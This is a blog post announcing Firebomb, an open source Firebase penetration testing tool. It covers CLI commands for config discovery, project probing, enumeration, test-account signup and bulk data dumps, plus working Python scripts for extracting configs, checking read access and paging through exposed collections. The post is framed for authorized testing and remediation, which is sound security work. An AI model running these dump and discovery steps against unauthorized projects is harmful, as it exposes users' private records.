Victor Yrazusta Ibarra

Originally published at modernpentest.com

Introducing Firebomb: Open Source Firebase Penetration Testing

We're releasing Firebomb, our open source penetration testing tool for Firebase applications. It's the same tool powering our automated Firebase security scanning at ModernPentest.

The Firebase Security Problem

Firebase makes it incredibly easy to build applications. Point your client SDK at Google's infrastructure, write some security rules, and you have a scalable backend in minutes.

But that ease of development has produced an epidemic of insecure applications:

  • 916 Firebase websites exposed 125 million user records in 2024
  • 31% of Firebase apps have exploitable security rules
  • Many apps ship with the console's test-mode rules, which allow unrestricted read and write, and never tighten them

Generic security scanners don't model Firebase's architecture: Firestore and Realtime Database security rules, Cloud Storage rules and ACLs, and the fact that the client SDK talks to Google's APIs directly, so those rules are the only server-side access control. They miss the misconfigurations that actually matter.

Firebomb changes that.

What Firebomb Does

Firebomb is a comprehensive security testing framework specifically for Firebase. It automates the complete penetration testing workflow:

1. Configuration Discovery

Firebomb automatically extracts Firebase credentials from web applications—no manual copying needed:

# Discover from a live application
uv run firebomb discover --url https://target-app.com

# Deep recursive crawl (follows all JS files)
uv run firebomb discover --url https://target-app.com --recursive

# Validate discovered configs against Firebase APIs
uv run firebomb discover --url https://target-app.com --recursive --validate

# Parse from local files
uv run firebomb discover --file bundle.js
uv run firebomb discover --har traffic.har

It finds credentials hidden in:

  • Inline JavaScript and HTML
  • Bundled and minified scripts (webpack, Vite, esbuild)
  • Code-split chunks and lazy-loaded modules
  • Next.js/React/Vue/Angular build artifacts
  • Source maps (extracts original source code)
  • Environment variables (NEXT_PUBLIC_FIREBASE_*, VITE_FIREBASE_*, etc.)

2. Proactive Discovery (No Credentials Needed)

Firebomb can discover Firebase projects without extracting credentials first:

# Probe by project ID
uv run firebomb probe --project-id suspected-project

# Generate and probe from company name
uv run firebomb probe --name "Acme Corp"

# Discover from domain
uv run firebomb probe --domain acme.com

This uses DNS enumeration and direct API probing to find Firebase projects and check for misconfigurations. Firebase projects get predictable hostnames (for example <project-id>.firebaseapp.com, <project-id>-default-rtdb.firebaseio.com and the <project-id>.appspot.com storage bucket), so a good guess at the project ID is enough to start probing. This is useful when you suspect Firebase usage but can't find the config.
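The extraction in section 1 and the hostname derivation in section 2 come down to a small amount of pattern matching, shown here as an added example that is not Firebomb's own code. The bundle text is constructed; the API keys in it are fake but have the real 39-character AIza shape; the default hostnames follow Firebase's naming (newer projects may use a .firebasestorage.app bucket, which is why the config's own storageBucket wins when present). Everything else is standard library.

```python
"""Pull Firebase web configs out of JavaScript and derive the endpoints to probe.

Added example, not Firebomb's extractor. The bundle text below is constructed.
"""
import re

# Keys of a firebaseConfig object; bundlers may quote them or leave them bare.
CONFIG_KEYS = ("apiKey", "authDomain", "databaseURL", "projectId", "storageBucket",
               "messagingSenderId", "appId", "measurementId")
ENV_TO_KEY = {"API_KEY": "apiKey", "AUTH_DOMAIN": "authDomain", "DATABASE_URL": "databaseURL",
              "PROJECT_ID": "projectId", "STORAGE_BUCKET": "storageBucket",
              "MESSAGING_SENDER_ID": "messagingSenderId", "APP_ID": "appId",
              "MEASUREMENT_ID": "measurementId"}

# apiKey:"..."   "projectId": '...'   appId:`...`
KV_RE = re.compile(r'["\']?\b(' + "|".join(CONFIG_KEYS) + r')\b["\']?\s*:\s*["\'`]([^"\'`]+)["\'`]')
# NEXT_PUBLIC_FIREBASE_API_KEY:"..."   VITE_FIREBASE_PROJECT_ID=acme   REACT_APP_FIREBASE_APP_ID='...'
ENV_RE = re.compile(r'(?:NEXT_PUBLIC|VITE|REACT_APP)_FIREBASE_([A-Z_]+)\s*[:=]\s*["\'`]?([^"\'`\s,;}]+)')
# Web API keys are 39 characters starting with AIza; they identify the project, they are not secrets.
WEB_API_KEY_RE = re.compile(r"^AIza[0-9A-Za-z_-]{35}$")


def extract_configs(js: str) -> list[dict]:
    """Collect key/value pairs in source order and split them into objects.

    Minified bundles interleave several configs: a key that repeats marks the start
    of the next object. The same config appearing in two chunks collapses to one."""
    pairs = [(m.start(), m.group(1), m.group(2)) for m in KV_RE.finditer(js)]
    pairs += [(m.start(), ENV_TO_KEY[m.group(1)], m.group(2))
              for m in ENV_RE.finditer(js) if m.group(1) in ENV_TO_KEY]
    objects, current = [], {}
    for _, key, value in sorted(pairs):
        if key in current:
            objects.append(current)
            current = {}
        current[key] = value
    if current:
        objects.append(current)
    unique = {}
    for cfg in objects:
        if "projectId" in cfg:                      # a fragment without a project is useless
            unique.setdefault((cfg["projectId"], cfg.get("apiKey")), cfg)
    return list(unique.values())


def looks_like_web_api_key(value: str) -> bool:
    return bool(WEB_API_KEY_RE.match(value))


def probe_targets(cfg: dict) -> dict:
    """Unauthenticated REST URLs for the RTDB root and the Storage object listing.

    Firestore is left out on purpose: its REST API needs a collection name to list."""
    pid = cfg["projectId"]
    rtdb = cfg.get("databaseURL", f"https://{pid}-default-rtdb.firebaseio.com").rstrip("/")
    bucket = cfg.get("storageBucket", f"{pid}.appspot.com")
    return {"rtdb_root": f"{rtdb}/.json",
            "storage_list": f"https://firebasestorage.googleapis.com/v0/b/{bucket}/o"}


# Constructed bundle: a minified chunk, a runtime env object, and a repeat of the chunk.
SAMPLE_BUNDLE = (
    'var e={apiKey:"AIzaSyA-CONSTRUCTED-KEY-0123456789abcde",authDomain:"acme-shop.firebaseapp.com",'
    'projectId:"acme-shop",storageBucket:"acme-shop.appspot.com",messagingSenderId:"42",'
    'appId:"1:42:web:abc"};'
    'window.__ENV__={NEXT_PUBLIC_FIREBASE_API_KEY:"AIzaSyB-CONSTRUCTED-KEY-9876543210zyxwv",'
    'NEXT_PUBLIC_FIREBASE_PROJECT_ID:"acme-staging",'
    'NEXT_PUBLIC_FIREBASE_DATABASE_URL:"https://acme-staging-default-rtdb.firebaseio.com"};'
    'var f={apiKey:"AIzaSyA-CONSTRUCTED-KEY-0123456789abcde",projectId:"acme-shop"};'
)

if __name__ == "__main__":
    for cfg in extract_configs(SAMPLE_BUNDLE):
        print(cfg["projectId"], "key shape ok:", looks_like_web_api_key(cfg.get("apiKey", "")))
        for name, url in probe_targets(cfg).items():
            print("  ", name, url)
```

Run it against a real bundle by reading the file into extract_configs; a 200 on the rtdb_root URL with a non-null body, or a 200 with an items list on storage_list, is the same public-read condition the probe and test commands report.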

3. Resource Enumeration

Once configured, Firebomb discovers all accessible Firebase resources:

uv run firebomb enum --output enumeration.json

This reveals:

  • Firestore: Collections, document counts, accessible fields
  • Realtime Database: Paths, data structure, accessible nodes
  • Cloud Storage: Buckets, file listings, ACL configurations
  • Cloud Functions: Endpoints, authentication requirements
  • Authentication: Enabled providers, configuration settings

4. Security Testing

The core of Firebomb—automated vulnerability testing across all Firebase services:

uv run firebomb test --output findings.json

Firestore Testing:

  • Public read/write access detection
  • Missing authentication checks
  • Cross-user data access vulnerabilities
  • Document-level permission gaps

Realtime Database Testing:

  • Public path vulnerabilities
  • Wildcard permission issues
  • Root-level database exposure
  • Over-broad parent-path rules (RTDB rules cascade: a read granted at a parent path cannot be revoked on its children)

Cloud Storage Testing:

  • Publicly readable/writable buckets
  • ACL misconfigurations
  • Unauthorized file operations

Cloud Functions Testing:

  • Unauthenticated function access
  • CORS misconfigurations
  • Missing input validation

Authentication Testing:

  • Anonymous authentication enabled
  • Email verification requirements
  • Password policy strength

Sample Output:

┌─────────────────────────────────────────────────────────────────┐
│ Security Testing Results                                        │
├─────────────────────────────────────────────────────────────────┤
│ Firestore: users                                                │
│   ✗ Collection publicly readable without authentication         │
│   Documents exposed: 1,847                                      │
│   Severity: CRITICAL                                            │
├─────────────────────────────────────────────────────────────────┤
│ Firestore: posts                                                │
│   ✓ Proper authentication required                              │
│   ✓ User-scoped access enforced                                 │
├─────────────────────────────────────────────────────────────────┤
│ Cloud Storage: user-uploads                                     │
│   ✗ Bucket publicly writable                                    │
│   Risk: Arbitrary file upload/malware hosting                   │
│   Severity: CRITICAL                                            │
├─────────────────────────────────────────────────────────────────┤
│ Authentication                                                  │
│   ⚠ Anonymous authentication enabled                            │
│   Risk: Unlimited account creation, resource abuse              │
│   Severity: MEDIUM                                              │
└─────────────────────────────────────────────────────────────────┘

5. Authenticated Testing

Test how permissions differ between anonymous and authenticated users:

# Auto-generate email with verification (recommended)
uv run firebomb signup --verify-email

# Or use manual email/password
uv run firebomb signup --email tester@example.com --password SecurePass123!

# Run tests with authentication
uv run firebomb test --auth
uv run firebomb enum --auth

This surfaces two classes of finding: resources that should require authentication but don't, and resources that any authenticated user can read rather than only their owner. The second is the more common one, and a self-registered account is all an attacker needs to exploit it.
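The Firestore checks in section 4 and the anonymous-versus-authenticated comparison in section 5 can be run with nothing but the REST API. The script below is an added example, not Firebomb's test command: it signs up a throwaway account through the Identity Toolkit signUp endpoint (anonymous when no email is given), then classifies a collection as public, readable by any authenticated user, owner-scoped, or locked. Two assumptions: documents in an owner-scoped collection are keyed by the user's uid, as in the rules example later on this page, and the simulated transport, rules and API key at the bottom are constructed so the script runs offline.

```python
"""Differential Firestore access check: anonymous vs. a freshly signed-up user.

Added example, not Firebomb's test command. It uses the documented Firestore and
Identity Toolkit REST endpoints; the simulated transport at the bottom is
constructed so the script also runs offline.
"""
import json
import urllib.error
import urllib.request

FIRESTORE = "https://firestore.googleapis.com/v1/projects/{pid}/databases/(default)/documents/{path}"
SIGNUP = "https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={key}"


def http_json(method, url, headers=None, body=None):
    """Real transport: (status, parsed JSON). HTTP errors are returned, not raised."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method,
                                 headers={"Content-Type": "application/json", **(headers or {})})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        raw = err.read()
        try:
            return err.code, json.loads(raw)
        except ValueError:
            return err.code, raw.decode(errors="replace")


def signup(api_key, transport=http_json, email=None, password=None):
    """Create a throwaway account. Without an email this is an anonymous sign-in.

    Returns (id_token, uid). A 400 carrying OPERATION_NOT_ALLOWED or
    ADMIN_ONLY_OPERATION means that provider is disabled, which is worth recording."""
    body = {"returnSecureToken": True}
    if email:
        body.update(email=email, password=password)
    status, resp = transport("POST", SIGNUP.format(key=api_key), body=body)
    if status != 200:
        raise RuntimeError(f"signUp failed: {status} {resp}")
    return resp["idToken"], resp["localId"]


def can_read(pid, path, api_key, transport=http_json, id_token=None):
    """True when the rules allow the read. A 404 on a document path still means
    'allowed': rules are evaluated first, the document is looked up after."""
    headers = {"Authorization": f"Bearer {id_token}"} if id_token else {}
    query = ("pageSize=1&" if "/" not in path else "") + f"key={api_key}"
    status, _ = transport("GET", FIRESTORE.format(pid=pid, path=path) + "?" + query, headers)
    if status in (200, 404):
        return True
    if status in (401, 403):
        return False
    raise RuntimeError(f"unexpected {status} for {path}")


def assess(pid, collection, api_key, id_token, uid, transport=http_json):
    """Classify a collection by who can list or read it."""
    if can_read(pid, collection, api_key, transport):
        return "PUBLIC"                    # anonymous list works: full exposure
    if can_read(pid, collection, api_key, transport, id_token):
        return "ANY_AUTHENTICATED_USER"    # any self-registered account lists everything
    if can_read(pid, f"{collection}/{uid}", api_key, transport, id_token):
        return "OWNER_SCOPED"              # only the caller's own document is readable
    return "LOCKED"                        # nothing readable with these probes


# Constructed simulation of a project with one collection per rule style.
FAKE_RULES = {"config": "public", "users": "owner", "orders": "authed", "audit": "locked"}
FAKE_UID = "uid-test-1"


def fake_transport(method, url, headers=None, body=None):
    if method == "POST" and "accounts:signUp" in url:
        return 200, {"idToken": "fake.id.token", "localId": FAKE_UID}
    path = url.split("/documents/")[1].split("?")[0]
    collection, _, doc = path.partition("/")
    signed_in = bool(headers and headers.get("Authorization"))
    mode = FAKE_RULES.get(collection, "locked")
    if mode == "public" or (mode == "authed" and signed_in):
        return 200, {"documents": []}
    if mode == "owner" and signed_in and doc == FAKE_UID:
        return 200, {"name": path, "fields": {}}
    return 403, {"error": {"status": "PERMISSION_DENIED",
                           "message": "Missing or insufficient permissions."}}


def demo(transport=fake_transport, api_key="AIza-constructed"):
    token, uid = signup(api_key, transport)
    return {c: assess("demo-project", c, api_key, token, uid, transport) for c in FAKE_RULES}


if __name__ == "__main__":
    for collection, verdict in demo().items():
        print(f"{collection:8s} {verdict}")
```

Against a live project, pass a real project ID and API key and leave transport at its default; LOCKED only means these three probes failed, not that the rules are correct, so a collection that stays LOCKED still deserves a look at the rules source when you have it.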

6. Data Extraction

Query specific collections or paths:

# Query specific Firestore collection
uv run firebomb query --collection users --output users.json

# Query RTDB path
uv run firebomb query --path /messages --output messages.json

# Export with limits
uv run firebomb query --collection orders --limit 100 --output sample.json

7. Bulk Data Dump

Export all accessible data for evidence collection:

# Dump all accessible Firebase data
uv run firebomb dump --output evidence.json

# Dump with authentication
uv run firebomb dump --auth --output auth-evidence.json

# Dump specific collections only
uv run firebomb dump --firestore-only --collections users,orders --output data.json

# Limit documents per collection
uv run firebomb dump --limit 500 --output sample.json

The dump command fetches actual document contents from Firestore, full data trees from RTDB, and file listings from Cloud Storage.
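A bounded dump of that kind has two details worth getting right: Firestore pages its document list (follow nextPageToken until the limit is reached, and unwrap the typed values it returns), and the RTDB can be listed with shallow=true before fetching anything, which keeps a root-level probe cheap on a large tree. The script below is an added example, not Firebomb's dump command; the endpoint shapes and response formats are the documented REST ones, and the in-memory transport, documents and API key at the bottom are constructed so it runs offline.

```python
"""Bounded dump of a Firestore collection and an RTDB subtree over REST.

Added example, not Firebomb's dump command. The in-memory transport at the
bottom is constructed so the script runs offline.
"""
import json
import urllib.error
import urllib.request


def http_get(url, headers=None):
    """(status, parsed JSON); a 4xx/5xx is returned, not raised."""
    try:
        with urllib.request.urlopen(urllib.request.Request(url, headers=headers or {}), timeout=15) as r:
            return r.status, json.loads(r.read() or b"null")
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"null")


def plain_value(v):
    """Unwrap one Firestore typed value, e.g. {"integerValue": "7"} -> 7."""
    (kind, inner), = v.items()
    if kind == "mapValue":
        return {k: plain_value(x) for k, x in inner.get("fields", {}).items()}
    if kind == "arrayValue":
        return [plain_value(x) for x in inner.get("values", [])]
    if kind == "integerValue":
        return int(inner)
    if kind == "nullValue":
        return None
    return inner          # string, boolean, double, timestamp, reference pass through


def dump_collection(pid, collection, api_key, limit, get=http_get, id_token=None, page_size=300):
    """Follow nextPageToken until `limit` documents are collected. Firestore may
    return fewer documents than pageSize asks for, so always loop on the token."""
    base = f"https://firestore.googleapis.com/v1/projects/{pid}/databases/(default)/documents/{collection}"
    headers = {"Authorization": f"Bearer {id_token}"} if id_token else {}
    docs, token = [], None
    while len(docs) < limit:
        url = f"{base}?pageSize={min(page_size, limit - len(docs))}&key={api_key}"
        if token:
            url += f"&pageToken={token}"
        status, body = get(url, headers)
        if status != 200:
            raise PermissionError(f"{status}: {body}")     # 403 PERMISSION_DENIED: rules hold
        for d in body.get("documents", []):
            fields = {k: plain_value(x) for k, x in d.get("fields", {}).items()}
            docs.append({"id": d["name"].rsplit("/", 1)[1], **fields})
        token = body.get("nextPageToken")
        if not token:
            break
    return docs[:limit]


def dump_rtdb(db_url, path, get=http_get, id_token=None):
    """List child keys with shallow=true first, then fetch each child.
    The RTDB REST API takes the ID token as the `auth` query parameter."""
    node = f"{db_url.rstrip('/')}/{path.strip('/')}"
    status, keys = get(f"{node}/.json?shallow=true" + (f"&auth={id_token}" if id_token else ""))
    if status != 200:
        raise PermissionError(f"{status}: {keys}")         # 401 {"error": "Permission denied"}
    out = {}
    for key in (keys or {}):
        status, value = get(f"{node}/{key}/.json" + (f"?auth={id_token}" if id_token else ""))
        if status == 200:
            out[key] = value
    return out


# Constructed data: five orders served in pages, and two RTDB messages.
FAKE_DOCS = [{"name": f"projects/demo/databases/(default)/documents/orders/o{i}",
              "fields": {"total": {"integerValue": str(i * 10)},
                         "email": {"stringValue": f"u{i}@example.com"}}} for i in range(5)]
FAKE_RTDB = {"messages": {"m1": {"text": "hi"}, "m2": {"text": "reset code 4242"}}}


def fake_get(url, headers=None):
    if "firestore.googleapis.com" in url:
        q = dict(p.split("=", 1) for p in url.split("?", 1)[1].split("&"))
        start, size = int(q.get("pageToken", 0)), int(q["pageSize"])
        body = {"documents": FAKE_DOCS[start:start + size]}
        if start + size < len(FAKE_DOCS):
            body["nextPageToken"] = str(start + size)
        return 200, body
    node = FAKE_RTDB
    for part in url.split(".firebaseio.com/", 1)[1].split("/.json", 1)[0].split("/"):
        node = node[part]
    return 200, ({k: True for k in node} if "shallow=true" in url else node)


def demo():
    orders = dump_collection("demo", "orders", "AIza-constructed", 3, fake_get, page_size=2)
    messages = dump_rtdb("https://demo-default-rtdb.firebaseio.com", "messages", fake_get)
    return orders, messages


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The limit matters for the same reason the page's examples pass --limit: evidence needs a handful of records, not a full copy of someone's user table, and anything you do pull should be handled as the sensitive data it is.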

8. Professional Reports

Generate stakeholder-ready security assessments:

# HTML report for executives
uv run firebomb report --format html --output assessment.html

# JSON report for developers
uv run firebomb report --format json --output findings.json

Reports include:

  • Executive summary with risk assessment
  • Detailed findings with severity classification
  • CWE and OWASP mapping
  • Remediation guidance with code examples
  • Evidence and proof of concept

Key Features

Smart Credential & Session Management

Firebomb caches discovered configurations and authentication sessions:

# Discover and cache (default behavior)
uv run firebomb discover --url https://app.com

# Later: credentials auto-loaded
uv run firebomb enum
uv run firebomb test

# View cached configurations
uv run firebomb cached

# View cached sessions
uv run firebomb cached --sessions

# Remove specific project
uv run firebomb cached --remove my-project

# Clear all cached data
uv run firebomb cached --clear

Comprehensive Service Coverage

Unlike generic scanners, Firebomb understands all Firebase services:

Service     What Firebomb Tests
----------  ---------------------------------------------------------
Firestore   Rules, collection access, cross-user data leakage
RTDB        Permissions, cascading parent-path rules, wildcard rules
Storage     Bucket ACLs, file type restrictions, public access
Functions   Authentication, CORS, input validation
Auth        Provider config, anonymous auth, MFA settings
Discovery   DNS probing, API probing, framework detection

Severity Classification

Findings are categorized by actual risk:

  • CRITICAL: Complete data exposure, write access to all data
  • HIGH: Significant data leakage, unauthorized access
  • MEDIUM: Configuration weaknesses, potential abuse vectors
  • LOW: Best practice violations, minor issues
  • INFO: Documentation, recommendations

Remediation Guidance

Every finding includes specific fix instructions:

┌─────────────────────────────────────────────────────────────────┐
│ Finding: Firestore collection 'users' publicly readable         │
├─────────────────────────────────────────────────────────────────┤
│ Severity: CRITICAL                                              │
│ CWE: CWE-284 (Improper Access Control)                          │
│ OWASP: A01:2021 - Broken Access Control                         │
├─────────────────────────────────────────────────────────────────┤
│ Current Rules:                                                  │
│   match /users/{userId} {                                       │
│     allow read: if true;                                        │
│   }                                                             │
├─────────────────────────────────────────────────────────────────┤
│ Recommended Fix:                                                │
│   match /users/{userId} {                                       │
│     allow read: if request.auth != null                         │
│       && request.auth.uid == userId;                            │
│   }                                                             │
└─────────────────────────────────────────────────────────────────┘

Advanced Capabilities

Framework Auto-Detection

Firebomb automatically detects and optimizes for modern frameworks:

  • Next.js: Parses _buildManifest.js, follows chunk patterns
  • React: Handles Create React App and custom builds
  • Vue/Nuxt: Detects Vue-specific bundle patterns
  • Vite: Extracts from Vite build outputs
  • Angular: Supports Angular CLI builds

Deep JavaScript Analysis

  • Recursive crawling with configurable depth and file limits
  • Webpack chunk extraction and following
  • Source map parsing for original source code
  • Environment variable pattern detection (NEXT_PUBLIC_*, VITE_*, etc.)
  • Minified code correlation for scattered config values

Installation

Firebomb requires Python 3.11+ and uses uv for dependency management:

# Clone the repository
git clone https://github.com/ModernPentest/firebomb.git
cd firebomb

# Run with uv (handles dependencies automatically)
uv run firebomb --help

Example Workflow

Here's a complete security assessment workflow:

# 1. Discover Firebase configuration with validation
uv run firebomb discover --url https://target-app.com --recursive --validate

# 2. Or probe by company name if config not found
uv run firebomb probe --name "Target Company"

# 3. Enumerate all resources
uv run firebomb enum --output enum.json

# 4. Run security tests
uv run firebomb test --output findings.json

# 5. Create test user with auto-verification
uv run firebomb signup --verify-email

# 6. Test with authentication
uv run firebomb test --auth --output auth-findings.json

# 7. Dump evidence from vulnerable resources
uv run firebomb dump --limit 100 --output evidence.json

# 8. Generate professional report
uv run firebomb report --format html --output security-assessment.html

Responsible Use

Firebomb is designed for authorized security testing only. Always ensure you have:

  • Written authorization from the Firebase project owner
  • Permission to test the specific project
  • Understanding of applicable laws

Never use this tool against applications you don't own or have explicit permission to test.

How It Powers ModernPentest

Firebomb is the foundation of our Firebase security scanning at ModernPentest. Our AI agents use Firebomb as their primary tool for:

  • Automated Firestore rules analysis
  • RTDB permission auditing
  • Cloud Storage ACL testing
  • Continuous monitoring for configuration drift

ModernPentest adds:

  • AI-powered analysis - Agents interpret findings and prioritize by actual business risk
  • Continuous scanning - Automated weekly/daily scans catch regressions
  • SOC 2 reports - Auditor-ready documentation generated automatically
  • Remediation guidance - Specific fix recommendations tailored to your codebase

For manual control, use Firebomb directly. For automated, continuous security with compliance reporting, try ModernPentest.

Get Started

The code is available on GitHub:

github.com/ModernPentest/firebomb

Star the repo, try it on your Firebase projects, and let us know what you find. We welcome contributions, bug reports, and feature requests.

For a deep dive into Firebase security best practices, check out our guide: Securing Firebase in Production.


Firebomb is part of our commitment to open source security tooling. Follow us for more tools and guides on securing modern web applications.
